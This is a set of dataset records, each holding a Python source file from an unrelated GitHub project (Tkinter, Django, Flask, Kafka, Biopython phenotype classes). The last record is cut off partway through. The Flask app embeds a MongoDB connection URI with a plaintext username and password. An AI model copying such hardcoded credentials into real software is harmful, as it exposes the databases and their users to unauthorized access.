True))\n file.write(\"\\n\")\n for r in Road.list:\n file.write(\"{} {} \\n\".format(cross_list.index(r.cross1), cross_list.index(r.cross2)))\n file.write(\"\\n\")\n for c in cross_list:\n if len(c.roads) > 2:\n file.write(\"{} {} {}\\n\".format(cross_list.index(c), Road.list.index(c.priority_axis[0]), Road.list.index(c.priority_axis[1])))\n file.close()\n\nroot.state('zoomed') # Maximize the window\ncontainer = Container(root)\ncontainer.grid(row=0, column=0, sticky=\"nsew\")\nmap = container.map\nroot.grid_rowconfigure(0, weight=2)\nroot.grid_columnconfigure(0, weight=2)\ncontrols = Controls(root)\ncontrols.grid(row=0, column=1, sticky=\"nsew\")\n\n# Event-listeners\n# NOTE: the event sequence strings were stripped from this copy of the source;\n# the names below are plausible standard Tkinter bindings, not the author's originals.\nroot.bind(\"<Key>\", keyboard_listener)\nmap.bind(\"<ButtonPress-3>\", map.scroll_start)\nmap.bind(\"<B3-Motion>\", map.scroll_move)\nmap.bind(\"<MouseWheel>\", map.zoom)\nroot.bind(\"<Control-Key>\", map.zoom)\nmap.bind(\"<Button-1>\", selector)\n\nroot.mainloop()\n","repo_name":"FabAlchemy/traffic-simulator","sub_path":"Traffic Simulation/map_creator.py","file_name":"map_creator.py","file_ext":"py","file_size_in_byte":14641,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"30138998761","text":"from django.urls import path\nfrom djangoapp.views import Materials, Groups, Works, Download, UploadWork, UploadMaterial, Delete, Redirect\n\nurlpatterns = [\n path('', Redirect.as_view(), name='main'),\n path('groups', Groups.as_view(), name='groups'),\n path('materials', Materials.as_view(), name='materials'),\n path('works', Works.as_view(), name='works'),\n path('delete/', Delete.as_view(), name='delete'),\n path('download/', Download.as_view(), name='download'),\n path('upload-material', UploadMaterial.as_view(), name='upload-material'),\n path('upload-work/', UploadWork.as_view(), name='upload-work'),\n]\n","repo_name":"SLinartS/kr_django","sub_path":"djangoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72069146488","text":"import cgi\nimport logging\nimport os\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom controllers.entities import Sura, Topic\nfrom controllers.page_controller import PageController\n\n\n\n\nclass MainPage(PageController):\n def perform_get(self):\n topics = Topic.all()\n self.template_values['topics'] = topics\n return 'index.html'\n\n\nclass SurasListPage(PageController):\n def perform_get(self):\n suras = Sura.gql(\"order by number\").fetch(114)\n self.template_values['suras'] = suras\n return 'suras_list.html'\n\n\nclass SurasDisplayPage(PageController):\n def perform_get(self):\n leading_length = len('/display_sura/')\n sura_number = int(self.request.path[leading_length:])\n sura = Sura.gql(\"WHERE number = :number \", number = int(sura_number)).fetch(1)[0]\n ayat = sura.aya_set\n ayat.order('number')\n\n self.template_values['sura'] = sura\n self.template_values['ayat'] = ayat\n \n return 'sura_display.html'\n\n\nclass SearchTopics(PageController):\n def perform_get(self):\n return \"/\"\n\n def perform_post(self):\n search_for = self.request.get('search_for')\n topics = Topic.all().search(search_for)\n\n self.template_values['topics'] = topics\n \n return 'search_results.html'\n\nclass StaticPages(PageController):\n def perform_get(self):\n page_name = self.request.path[1:]\n return page_name + \".html\"\n\n\napplication = webapp.WSGIApplication(\n [('/', MainPage),\n ('/list_suras', SurasListPage),\n ('/display_sura/.*', SurasDisplayPage),\n ('/search', SearchTopics),\n ('/.*', StaticPages)],\n debug=True)\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()","repo_name":"gaussianera/qurantopics","sub_path":"QuranTopics/controllers/qurantopics.py","file_name":"qurantopics.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37117776098","text":"from flask import Flask\nfrom datetime import datetime\nimport pymongo\napp = Flask(__name__)\n\nmyclient = 
pymongo.MongoClient('mongodb+srv://thuan:thuan@cluster0.9gguq.mongodb.net/test')\nmydb = myclient[\"mydatabase\"]\n\n@app.route(\"/\")\ndef hello():\n NOW = datetime.now()\n mydb.visits.insert_one({'created_at': NOW})\n num = mydb.visits.count_documents({})\n return f\"Number of visits: {num}\"","repo_name":"superbakuryu/flask_heroku","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18094117568","text":"import pytest\n\nParameterSet = type(pytest.param())\n\n\ndef extract_fixtures_values(item):\n \"\"\"Extracts names and values of all the fixtures that the test has.\n\n Args:\n item: py.test test item\n Returns:\n :py:class:`dict` with fixtures and their values.\n \"\"\"\n if hasattr(item, \"callspec\"):\n return item.callspec.params.copy() # protect against accidental manipulation of the spec\n else:\n # Some of the test items do not have this, so fall back\n # This can cause some problems if the fixtures are used in the guards in this case, but\n # that will tell us where the problem is and we can then find it out properly.\n return {}\n\n\ndef trim_items(iterable, keep_index):\n return [e[1]\n for e in enumerate(iterable)\n if e[0] in keep_index]\n\n\ndef fixture_filter(metafunc, argnames, argvalues):\n \"\"\"Filter fixtures based on fixturenames in\n the function represented by ``metafunc``\"\"\"\n\n # Identify indices of matches between argnames and fixturenames\n keep_index = [e[0] for e in enumerate(argnames) if e[1] in metafunc.fixturenames]\n\n # Keep items at indices in keep_index\n def f(values):\n if isinstance(values, (list, tuple)) and not isinstance(values, ParameterSet):\n return trim_items(values, keep_index)\n else:\n parameterset = ParameterSet.extract_from(values)\n return parameterset._replace(values=trim_items(parameterset.values, keep_index))\n\n # Generate the new values\n argnames = f(argnames)\n argvalues = list(map(f, argvalues))\n return argnames, argvalues\n","repo_name":"ManageIQ/integration_tests","sub_path":"cfme/utils/pytest_shortcuts.py","file_name":"pytest_shortcuts.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"77"} +{"seq_id":"4635509569","text":"import os\nimport json\n\ncurrent_path = os.getcwd()\nproducts_file_path = os.path.join(current_path, 'DB', 'products.txt')\nusers_file_path = os.path.join(current_path, \"DB\", \"users.txt\")\nimage_files_dir_path = os.path.join(current_path, \"DB\", \"Images\")\n\n\ndef get_products_content(page_id, sign):\n products = []\n current_products = []\n with open(products_file_path, 'r') as file:\n for line in file.read().split('\\n'):\n if line:\n product = json.loads(line)\n product = {k: os.path.join(image_files_dir_path, v) if k == \"img_path\" else v\n for k, v in product.items()}\n\n if sign == '<' and product['quantity'] > 0:\n continue\n elif sign == '>' and product['quantity'] <= 0:\n continue\n\n current_products.append(product)\n if len(current_products) == 14:\n products.append(current_products.copy())\n current_products.clear()\n\n if current_products:\n products.append(current_products)\n\n if len(products) >= page_id + 1:\n return products[page_id]\n return []\n\n\ndef reduce_product_quantity(product_id):\n products = []\n with open(products_file_path, 'r+') as file:\n for line in [line for line in file.read().split('\\n') if line]:\n line = json.loads(line)\n if 
line['id'] == product_id:\n if line['quantity'] <= 0:\n return line['id']\n\n line['quantity'] -= line['doze'] if line['quantity'] >= line['doze'] else line['quantity']\n\n products.append(line)\n\n file.truncate(0)\n file.seek(0)\n for line in products:\n file.write(json.dumps(line))\n file.write(f\"\\n\")\n\n\ndef add_product_to_user_products(current_user, product_id, now):\n users = []\n with open(users_file_path, 'r+') as file:\n for line in file.read().split('\\n'):\n if line:\n user = json.loads(line)\n users.append(user)\n\n file.truncate(0)\n file.seek(0)\n\n for user in users:\n if user['username'] == current_user:\n user['sold_products'].append((product_id, now))\n\n file.write(json.dumps(user))\n file.write('\\n')\n\n\ndef add_product_to_inventory(product):\n error = []\n product = {k: v.get() for k, v in product.items()}\n mapper = {\n \"name\": \"product name\",\n \"taste\": \"product taste\",\n \"quantity\": \"product quantity\",\n \"img_path\": \"image path\",\n \"price\": \"product price\",\n \"unit\": \"selling unit\",\n \"doze\": \"selling doze\",\n }\n\n for k, v in product.items():\n if not v:\n error.append(f\"Enter {mapper[k]}!\")\n continue\n\n if k == \"img_path\":\n if v not in os.listdir(image_files_dir_path):\n error.append(f'Image \"{product[k]}\" does not exist in ..DB/Images!')\n\n elif k == \"quantity\" or k == \"price\" or k == \"doze\":\n try:\n product[k] = float(v)\n if product[k] < 0:\n raise ValueError\n except ValueError:\n error.append(f\"{mapper[k]} must be a positive integer!\")\n\n elif k == \"unit\":\n units = ['gr', 'kg', 'ml', 'count']\n\n if v not in units:\n error.append(f\"Product unit must be one of: {', '.join(units)}\")\n\n if not error:\n with open(products_file_path, 'r+') as file:\n next_id = len(file.read().split('\\n'))\n product.update({\"id\": next_id})\n file.write(json.dumps(product))\n file.write(\"\\n\")\n\n return '\\n'.join(error)\n\n\ndef increase_product_quantity(product_id, quantity):\n products = []\n is_found = False\n error = []\n if not product_id:\n error.append(f\"Enter product name!\")\n if not quantity:\n error.append(f\"Enter product quantity!\")\n\n if error:\n return '\\n'.join(error)\n\n with open(products_file_path, 'r+') as file:\n for line in [line for line in file.read().split('\\n') if line]:\n line = json.loads(line)\n if product_id == line['id']:\n is_found = True\n try:\n quantity = int(quantity)\n if quantity < 0:\n raise ValueError\n line['quantity'] += int(quantity)\n except ValueError:\n error.append(f\"Product quantity must be a positive integer!\")\n break\n\n products.append(line)\n\n if not is_found:\n error.append(f\"Product not found!\")\n\n if error:\n return '\\n'.join(error)\n\n file.truncate(0)\n file.seek(0)\n for line in products:\n file.write(json.dumps(line))\n file.write('\\n')\n","repo_name":"4um3n/SoftUni-Courses","sub_path":"Python-Advanced/Modules/Exercises/GUI-Shop/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"74783684409","text":"import Bio.Phylo as bp\nimport cPickle as pkl\nwith open('data/accessions.pkl') as pkl_file:\n accessions = pkl.load(pkl_file)\n\ntree = bp.read('data/picoides_geo.newick','newick')\ntree.root_at_midpoint()\nfor terminal in tree.get_terminals():\n if terminal.name in accessions:\n terminal.name = accessions[terminal.name][0]\n 
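# Render the relabeled tree as ASCII art in the terminal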
\nbp._utils.draw_ascii(tree)\n","repo_name":"bendmorris/picoides-phylogeography","sub_path":"draw_tree.py","file_name":"draw_tree.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30766129218","text":"import sys\r\nfrom collections import defaultdict\r\n\r\ninput = sys.stdin.readline\r\n\r\n\r\ntc = int(input())\r\nfor _ in range(tc):\r\n n = int(input())\r\n counts = defaultdict(int)\r\n for _ in range(n):\r\n _, c = input().split()\r\n counts[c] += 1\r\n for c in counts:\r\n counts[c] += 1\r\n\r\n answer = 1\r\n for c in counts:\r\n answer *= counts[c]\r\n\r\n print(answer - 1)","repo_name":"ng-lee/ProblemSolving","sub_path":"백준/Silver/9375. 패션왕 신해빈/패션왕 신해빈.py","file_name":"패션왕 신해빈.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38305911317","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nScript Name: \nAuthor: Do Trinh/Jimmy - 3D artist.\n\nDescription:\n\n\n\"\"\"\n# -------------------------------------------------------------------------------------------------------------\n\nfrom urllib import parse\nfrom cgi import parse_header\nfrom pyPLM.Core import Url, FileInfo\n\n\ndef filenameFromHeader(header):\n value, params = parse_header(header)\n if 'filename*' in params:\n filename = params['filename*']\n if filename.startswith(\"UTF-8''\"):\n filename = parse.unquote(filename[7:])\n elif 'filename' in params:\n filename = params['filename']\n else:\n filename = ''\n return filename\n\n\ndef filenameFromUrl(addr):\n link = Url.fromUserInput(addr)\n link.setFragment(None)\n link = link.toString(Url.RemoveQuery)\n return FileInfo(parse.unquote_plus(link)).fileName()\n\n\n\n# -------------------------------------------------------------------------------------------------------------\n# Created by Trinh Do on 5/6/2020 - 3:13 AM\n# © 2017 - 2020 DAMGteam. 
All rights reserved","repo_name":"vtta2008/PLM","sub_path":"PLM/utils/nets.py","file_name":"nets.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"876398710","text":"\"\"\"\nThis module defines the SaveFileInfo class\n\"\"\"\nfrom app.utils.difficulty import Difficulty\nfrom app.utils.upgrade import Upgrade\n\n\nclass SaveFileInfo:\n \"\"\"\n This class contains all the information that is needed to be saved when saving the game\n \"\"\"\n def __init__(self, round_number: int, difficulty: Difficulty, player_health: int, upgrades: list[Upgrade], best_score: int):\n \"\"\"\n Constructor for the SaveFileInfo class\n :param round_number: Number of the current round\n :param difficulty: Difficulty chosen by the player\n :param player_health: Current number of player's health points\n :param upgrades: Upgrades chosen by the player in the game\n :param best_score: Best score achieved in the game\n \"\"\"\n self.round_number: int = round_number\n self.difficulty: Difficulty = difficulty\n self.player_health: int = player_health\n self.upgrades: list[Upgrade] = upgrades\n self.best_score: int = best_score\n","repo_name":"Mogula99/Defender","sub_path":"app/src/savefilemanager/save_file_info.py","file_name":"save_file_info.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8123309772","text":"import orjson\nfrom aiokafka import AIOKafkaConsumer\nfrom functools import wraps\nfrom pydantic import ValidationError\n\nfrom app.db.session import async_session\nfrom app.settings import KAFKA_URI\nfrom app.settings import logger\nfrom app.tp_kafka import handlers\nfrom app.utils.base_schema import BaseSchema\n\n\nconsumer = AIOKafkaConsumer(\"user\", bootstrap_servers=KAFKA_URI)\n\n\nasync def consume():\n await consumer.start() \n try:\n async for msg in consumer:\n if msg.topic == \"user\":\n await handlers.upsert_user(msg.value)\n finally:\n logger.info(\"consumer stopped\")\n await consumer.stop()\n\n\ndef topic_msg_decode(schema: BaseSchema):\n def wrap(func):\n @wraps(func)\n async def wrapped(msg_bytes: bytes, *args, **kwargs):\n try:\n msg_decoded = orjson.loads(msg_bytes.decode())\n msg = schema.validate(msg_decoded).dict()\n async with async_session() as get_db:\n response = await func(msg, get_db, *args, **kwargs)\n return response \n except ValidationError as error_message:\n logger.error(error_message)\n except Exception as error_message:\n logger.error(error_message) \n return wrapped\n return wrap","repo_name":"Sobolev5/ABC-Service","sub_path":"stats/app/tp_kafka/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31859027848","text":"import warnings\nimport json\nimport csv\nimport numpy as np\n\nfrom Bio import BiopythonParserWarning\n\n# Private csv headers - hardcoded because these are supposedly never changed\n_datafile = \"Data File\"\n_plate = \"Plate Type\"\n_strainType = \"Strain Type\"\n_sample = \"Sample Number\"\n_strainName = \"Strain Name\"\n_strainNumber = \"Strain Number\"\n_other = \"Other\"\n_hour = \"Hour\"\n_file = \"File\"\n_position = \"Position\"\n_setupTime = \"Setup Time\"\n\n_platesPrefix = \"PM\"\n_platesPrefixMammalian = \"PM-M\"\n#\n\n# Json identifiers - hardcoded as they are set by the creators of opm\n_csvData = \"csv_data\"\n_measurements = \"measurements\"\n#\n\n\nclass PlateRecord:\n \"\"\"PlateRecord object for storing Phenotype Microarray plates data.\n\n A PlateRecord stores all the wells of a particular phenotype\n Microarray plate, along with metadata (if any). The single wells can be\n accessed by calling their id as an index or iterating on the PlateRecord:\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> well = plate['A05']\n >>> for well in plate:\n ... print(well.id)\n ...\n A01\n ...\n\n The plate rows and columns can be queried with an indexing system similar\n to NumPy and other matrices:\n\n >>> print(plate[1])\n Plate ID: PM01\n Well: 12\n Rows: 1\n Columns: 12\n PlateRecord('WellRecord['B01'], WellRecord['B02'], WellRecord['B03'], ..., WellRecord['B12']')\n\n >>> print(plate[:,1])\n Plate ID: PM01\n Well: 8\n Rows: 8\n Columns: 1\n PlateRecord('WellRecord['A02'], WellRecord['B02'], WellRecord['C02'], ..., WellRecord['H02']')\n\n Single WellRecord objects can be accessed using this indexing system:\n\n >>> print(plate[1,2])\n Plate ID: PM01\n Well ID: B03\n Time points: 384\n Minimum signal 0.00 at time 11.00\n Maximum signal 76.25 at time 18.00\n WellRecord('(0.0, 11.0), (0.25, 11.0), (0.5, 11.0), (0.75, 11.0), (1.0, 11.0), ..., (95.75, 11.0)')\n\n The presence of a particular well can be inspected with the \"in\" keyword:\n >>> 'A01' in plate\n True\n\n All the wells belonging to a \"row\" (identified by the first character of\n the well id) in the plate can be obtained:\n\n >>> for well in plate.get_row('H'):\n ... print(well.id)\n ...\n H01\n H02\n H03\n ...\n\n All the wells belonging to a \"column\" (identified by the number of the well)\n in the plate can be obtained:\n\n >>> for well in plate.get_column(12):\n ... print(well.id)\n ...\n A12\n B12\n C12\n ...\n\n Two PlateRecord objects can be compared: if all their wells are equal the\n two plates are considered equal:\n\n >>> plate2 = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> plate == plate2\n True\n\n Two PlateRecord objects can be summed up or subtracted from each other: the\n signals of each well will be summed up or subtracted. 
The id of the\n left operand will be kept:\n\n >>> plate3 = plate + plate2\n >>> print(plate3.id)\n PM01\n\n Many Phenotype Microarray plate have a \"negative control\" well, which can\n be subtracted to all wells:\n\n >>> subplate = plate.subtract_control()\n\n \"\"\"\n\n def __init__(self, plateid, wells=None):\n \"\"\"Initialize the class.\"\"\"\n self.id = plateid\n\n if wells is None:\n wells = []\n\n # Similar behaviour as GenBank\n # Contains all the attributes\n self.qualifiers = {}\n\n # Well_id --> WellRecord objects\n self._wells = {}\n try:\n for w in wells:\n self._is_well(w)\n self[w.id] = w\n except TypeError:\n raise TypeError(\n \"You must provide an iterator-like object containing the single wells\"\n )\n\n self._update()\n\n def _update(self):\n \"\"\"Update the rows and columns string identifiers (PRIVATE).\"\"\"\n self._rows = sorted({x[0] for x in self._wells})\n self._columns = sorted({x[1:] for x in self._wells})\n\n def _is_well(self, obj):\n \"\"\"Check if the given object is a WellRecord object (PRIVATE).\n\n Used both for the class constructor and the __setitem__ method\n \"\"\"\n # Value should be of WellRecord type\n if not isinstance(obj, WellRecord):\n raise ValueError(\n f\"A WellRecord type object is needed as value (got {type(obj)})\"\n )\n\n def __getitem__(self, index):\n \"\"\"Access part of the plate.\n\n Depending on the indices, you can get a WellRecord object\n (representing a single well of the plate),\n or another plate\n (representing some part or all of the original plate).\n\n plate[wid] gives a WellRecord (if wid is a WellRecord id)\n plate[r,c] gives a WellRecord\n plate[r] gives a row as a PlateRecord\n plate[r,:] gives a row as a PlateRecord\n plate[:,c] gives a column as a PlateRecord\n\n plate[:] and plate[:,:] give a copy of the plate\n\n Anything else gives a subset of the original plate, e.g.\n plate[0:2] or plate[0:2,:] uses only row 0 and 1\n plate[:,1:3] uses only columns 1 and 2\n plate[0:2,1:3] uses only rows 0 & 1 and only cols 1 & 2\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n\n You can access a well of the plate, using its id.\n\n >>> w = plate['A01']\n\n You can access a row of the plate as a PlateRecord using an integer\n index:\n\n >>> first_row = plate[0]\n >>> print(first_row)\n Plate ID: PM01\n Well: 12\n Rows: 1\n Columns: 12\n PlateRecord('WellRecord['A01'], WellRecord['A02'], WellRecord['A03'], ..., WellRecord['A12']')\n >>> last_row = plate[-1]\n >>> print(last_row)\n Plate ID: PM01\n Well: 12\n Rows: 1\n Columns: 12\n PlateRecord('WellRecord['H01'], WellRecord['H02'], WellRecord['H03'], ..., WellRecord['H12']')\n\n You can also access use python's slice notation to sub-plates\n containing only some of the plate rows:\n\n >>> sub_plate = plate[2:5]\n >>> print(sub_plate)\n Plate ID: PM01\n Well: 36\n Rows: 3\n Columns: 12\n PlateRecord('WellRecord['C01'], WellRecord['C02'], WellRecord['C03'], ..., WellRecord['E12']')\n\n This includes support for a step, i.e. plate[start:end:step], which\n can be used to select every second row:\n\n >>> sub_plate = plate[::2]\n\n You can also use two indices to specify both rows and columns.\n Using simple integers gives you the single wells. 
e.g.\n\n >>> w = plate[3, 4]\n >>> print(w.id)\n D05\n\n To get a single column use this syntax:\n\n >>> sub_plate = plate[:, 4]\n >>> print(sub_plate)\n Plate ID: PM01\n Well: 8\n Rows: 8\n Columns: 1\n PlateRecord('WellRecord['A05'], WellRecord['B05'], WellRecord['C05'], ..., WellRecord['H05']')\n\n Or, to get part of a column,\n\n >>> sub_plate = plate[1:3, 4]\n >>> print(sub_plate)\n Plate ID: PM01\n Well: 2\n Rows: 2\n Columns: 1\n PlateRecord(WellRecord['B05'], WellRecord['C05'])\n\n However, in general you get a sub-plate,\n\n >>> print(plate[1:5, 3:6])\n Plate ID: PM01\n Well: 12\n Rows: 4\n Columns: 3\n PlateRecord('WellRecord['B04'], WellRecord['B05'], WellRecord['B06'], ..., WellRecord['E06']')\n\n This should all seem familiar to anyone who has used the NumPy\n array or matrix objects.\n \"\"\"\n # Well identifier access\n if isinstance(index, str):\n try:\n return self._wells[index]\n except KeyError:\n raise KeyError(f\"Well {index} not found!\")\n\n # Integer index\n elif isinstance(index, int):\n try:\n row = self._rows[index]\n except IndexError:\n raise IndexError(\"Row %d not found!\" % index)\n return PlateRecord(\n self.id, filter(lambda x: x.id.startswith(row), self._wells.values())\n )\n\n # Slice\n elif isinstance(index, slice):\n rows = self._rows[index]\n return PlateRecord(\n self.id, filter(lambda x: x.id[0] in rows, self._wells.values())\n )\n\n # Other access\n elif len(index) != 2:\n raise TypeError(\"Invalid index type.\")\n\n row_index, col_index = index\n if isinstance(row_index, int) and isinstance(col_index, int):\n # Return a single WellRecord\n try:\n row = self._rows[row_index]\n except IndexError:\n raise IndexError(\"Row %d not found!\" % row_index)\n try:\n col = self._columns[col_index]\n except IndexError:\n raise IndexError(\"Column %d not found!\" % col_index)\n\n return self._wells[row + col]\n\n elif isinstance(row_index, int):\n try:\n row = self._rows[row_index]\n except IndexError:\n raise IndexError(\"Row %d not found!\" % row_index)\n cols = self._columns[col_index]\n\n return PlateRecord(\n self.id,\n filter(\n lambda x: x.id.startswith(row) and x.id[1:] in cols,\n self._wells.values(),\n ),\n )\n\n elif isinstance(col_index, int):\n try:\n col = self._columns[col_index]\n except IndexError:\n raise IndexError(\"Columns %d not found!\" % col_index)\n rows = self._rows[row_index]\n\n return PlateRecord(\n self.id,\n filter(\n lambda x: x.id.endswith(col) and x.id[0] in rows,\n self._wells.values(),\n ),\n )\n\n else:\n rows = self._rows[row_index]\n cols = self._columns[col_index]\n\n return PlateRecord(\n self.id,\n filter(\n lambda x: x.id[0] in rows and x.id[1:] in cols, self._wells.values()\n ),\n )\n\n def __setitem__(self, key, value):\n if not isinstance(key, str):\n raise ValueError(\"Well identifier should be string-like\")\n self._is_well(value)\n # Provided key and well ID should be the same\n if value.id != key:\n raise ValueError(\n \"WellRecord ID and provided key are different (got '%s' and '%s')\"\n % (type(value.id), type(key))\n )\n self._wells[key] = value\n\n self._update()\n\n def __delitem__(self, key):\n if not isinstance(key, str):\n raise ValueError(\"Well identifier should be string-like\")\n del self._wells[key]\n\n self._update()\n\n def __iter__(self):\n for well in sorted(self._wells):\n yield self._wells[well]\n\n def __contains__(self, wellid):\n if wellid in self._wells:\n return True\n return False\n\n def __len__(self):\n \"\"\"Return the number of wells in this plate.\"\"\"\n return 
len(self._wells)\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self._wells == other._wells\n else:\n return False\n\n def __add__(self, plate):\n \"\"\"Add another PlateRecord object.\n\n The wells in both plates must be the same\n\n A new PlateRecord object is returned, having the same id as the\n left operand.\n \"\"\"\n if not isinstance(plate, PlateRecord):\n raise TypeError(\"Expecting a PlateRecord object\")\n\n if {x.id for x in self} != {x.id for x in plate}:\n raise ValueError(\"The two plates have different wells\")\n\n wells = []\n\n for w in self:\n wells.append(w + plate[w.id])\n\n newp = PlateRecord(self.id, wells=wells)\n\n return newp\n\n def __sub__(self, plate):\n \"\"\"Subtract another PlateRecord object.\n\n The wells in both plates must be the same\n\n A new PlateRecord object is returned, having the same id as the\n left operand.\n \"\"\"\n if not isinstance(plate, PlateRecord):\n raise TypeError(\"Expecting a PlateRecord object\")\n\n if {x.id for x in self} != {x.id for x in plate}:\n raise ValueError(\"The two plates have different wells\")\n\n wells = []\n\n for w in self:\n wells.append(w - plate[w.id])\n\n newp = PlateRecord(self.id, wells=wells)\n\n return newp\n\n def get_row(self, row):\n \"\"\"Get all the wells of a given row.\n\n A row is identified with a letter (e.g. 'A')\n \"\"\"\n # Key is casted to str implicitly\n try:\n row = str(row)\n except Exception:\n # Is it even possible to get an exception here?\n raise ValueError(\"Row identifier should be string-like\")\n if len(row) > 1:\n raise ValueError(\"Row identifier must be of maximum one letter\")\n\n for w in sorted(filter(lambda x: x.startswith(row), self._wells)):\n yield self._wells[w]\n\n def get_column(self, column):\n \"\"\"Get all the wells of a given column.\n\n A column is identified with a number (e.g. 
'6')\n \"\"\"\n # Column is casted to int implicitly\n try:\n column = int(column)\n except Exception:\n raise ValueError(\"Column identifier should be a number\")\n\n # A 96-well plate has well numbers in two digits\n for w in sorted(filter(lambda x: x.endswith(\"%02d\" % column), self._wells)):\n yield self._wells[w]\n\n def subtract_control(self, control=\"A01\", wells=None):\n \"\"\"Subtract a 'control' well from the other plates wells.\n\n By default the control is subtracted to all wells, unless\n a list of well ID is provided\n\n The control well should belong to the plate\n A new PlateRecord object is returned\n \"\"\"\n if control not in self:\n raise ValueError(\"Control well not present in plate\")\n wcontrol = self[control]\n\n if wells is None:\n wells = self._wells.keys()\n\n missing = {w for w in wells if w not in self}\n if missing:\n raise ValueError(\"Some wells to be subtracted are not present\")\n\n nwells = []\n\n for w in self:\n if w.id in wells:\n nwells.append(w - wcontrol)\n else:\n nwells.append(w)\n\n newp = PlateRecord(self.id, wells=nwells)\n\n return newp\n\n def __repr__(self):\n \"\"\"Return a (truncated) representation of the plate for debugging.\"\"\"\n if len(self._wells) > 4:\n # Show the last well and the first three\n return \"%s('%s, ..., %s')\" % (\n self.__class__.__name__,\n \", \".join(\n [\n \"%s['%s']\" % (self[x].__class__.__name__, self[x].id)\n for x in sorted(self._wells.keys())[:3]\n ]\n ),\n \"%s['%s']\"\n % (\n self[sorted(self._wells.keys())[-1]].__class__.__name__,\n self[sorted(self._wells.keys())[-1]].id,\n ),\n )\n else:\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \", \".join(\n [\n \"%s['%s']\" % (self[x].__class__.__name__, self[x].id)\n for x in sorted(self._wells.keys())\n ]\n ),\n )\n\n def __str__(self):\n \"\"\"Return a human readable summary of the record (string).\n\n The python built in function str works by calling the object's __str__\n method. e.g.\n\n >>> from Bio import phenotype\n >>> record = next(phenotype.parse(\"phenotype/Plates.csv\", \"pm-csv\"))\n >>> print(record)\n Plate ID: PM01\n Well: 96\n Rows: 8\n Columns: 12\n PlateRecord('WellRecord['A01'], WellRecord['A02'], WellRecord['A03'], ..., WellRecord['H12']')\n\n Note that long well lists are shown truncated.\n \"\"\"\n lines = []\n if self.id:\n lines.append(f\"Plate ID: {self.id}\")\n lines.append(\"Well: %i\" % len(self))\n # Here we assume that all well ID start with a char\n lines.append(\"Rows: %d\" % len({x.id[0] for x in self}))\n # Here we assume that well number is a two-digit number\n lines.append(\"Columns: %d\" % len({x.id[1:3] for x in self}))\n lines.append(repr(self))\n return \"\\n\".join(lines)\n\n\nclass WellRecord:\n \"\"\"WellRecord stores all time course signals of a phenotype Microarray well.\n\n The single time points and signals can be accessed iterating on the\n WellRecord or using lists indexes or slices:\n\n >>> from Bio import phenotype\n >>> plate = phenotype.read(\"phenotype/Plate.json\", \"pm-json\")\n >>> well = plate['A05']\n >>> for time, signal in well:\n ... 
print(\"Time: %f, Signal: %f\" % (time, signal)) # doctest:+ELLIPSIS\n ...\n Time: 0.000000, Signal: 14.000000\n Time: 0.250000, Signal: 13.000000\n Time: 0.500000, Signal: 15.000000\n Time: 0.750000, Signal: 15.000000\n ...\n >>> well[1]\n 16.0\n >>> well[1:5]\n [16.0, 20.0, 18.0, 15.0]\n >>> well[1:5:0.5]\n [16.0, 19.0, 20.0, 18.0, 18.0, 18.0, 15.0, 18.0]\n\n If a time point was not present in the input file but it's between the\n minimum and maximum time point, the interpolated signal is returned,\n otherwise a nan value:\n\n >>> well[1.3]\n 19.0\n >>> well[1250]\n nan\n\n Two WellRecord objects can be compared: if their input time/signal pairs\n are exactly the same, the two records are considered equal:\n\n >>> well2 = plate['H12']\n >>> well == well2\n False\n\n Two WellRecord objects can be summed up or subtracted from each other: a new\n WellRecord object is returned, having the left operand id.\n\n >>> well1 = plate['A05']\n >>> well2 = well + well1\n >>> print(well2.id)\n A05\n\n If SciPy is installed, a sigmoid function can be fitted to the PM curve,\n in order to extract some parameters; three sigmoid functions are available:\n * gompertz\n * logistic\n * richards\n The functions are described in Zwietering et al., 1990 (PMID: 16348228)\n\n For example::\n\n well.fit()\n print(well.slope, well.model)\n (61.853516785566917, 'logistic')\n\n If not sigmoid function is specified, the first one that is successfully\n fitted is used. The user can also specify a specific function.\n\n To specify gompertz::\n\n well.fit('gompertz')\n print(well.slope, well.model)\n (127.94630059171354, 'gompertz')\n\n If no function can be fitted, the parameters are left as None, except for\n the max, min, average_height and area.\n \"\"\"\n\n def __init__(self, wellid, plate=None, signals=None):\n \"\"\"Initialize the class.\"\"\"\n if 